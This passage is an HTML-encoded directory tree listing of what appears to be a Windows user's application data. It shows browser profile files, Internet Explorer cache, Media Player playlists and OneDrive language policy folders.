&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Preferences
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; README
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Safe Browsing Network
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; NetworkDataMigrated
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Secure Preferences
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ServerCertificate
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ServerCertificate-journal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Site Characteristics Database
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 000003.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CURRENT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; MANIFEST-000001
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Sync Data
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; LevelDB
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 000003.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CURRENT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; LOG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; MANIFEST-000001
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Top Sites
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Top Sites-journal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Vpn Tokens
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Vpn Tokens-journal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Last Version
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Local State
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Nurturing
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; campaign_history
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; campaign_history-journal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ShaderCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; data_0
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; data_1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; data_2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; data_3
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; index
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Variations
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; GameDVR
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; KnownGameList.bin
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; input
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; en-US
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; userdict_v1.0409.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Internet Explorer
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; brndlog.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CacheStorage
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; edb.chk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; edb.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; edbres00001.jrs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; edbres00002.jrs
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; edbtmp.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ie4uinit-ClearIconCache.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ie4uinit-UserConfig.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; IECompatData
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; iecompatdata.xml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; MSIMGSIZ.DAT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Media Player
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Sync Playlists
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; en-US
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; 00029C36
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 01_Music_auto_rated_at_5_stars.wpl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 02_Music_added_in_the_last_month.wpl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 03_Music_rated_at_4_or_5_stars.wpl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 04_Music_played_in_the_last_month.wpl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 05_Pictures_taken_in_the_last_month.wpl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 06_Pictures_rated_4_or_5_stars.wpl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 07_TV_recorded_in_the_last_week.wpl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 08_Video_rated_at_4_or_5_stars.wpl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 09_Music_played_the_most.wpl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 10_All_Music.wpl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9500;&#9472;&#9472; 11_All_Pictures.wpl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;             &#9492;&#9472;&#9472; 12_All_Video.wpl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 25.140.0720.0001
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; adal.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; adm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; de
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDrive.adml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; es
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDrive.adml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; fr
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDrive.adml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; hu
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDrive.adml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; it
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDrive.adml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ja
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDrive.adml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ko
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDrive.adml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; nl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDrive.adml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive.adml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive.admx
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; pl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDrive.adml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; pt-BR
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDrive.adml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; pt-PT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDrive.adml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ru
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDrive.adml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; sv
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDrive.adml
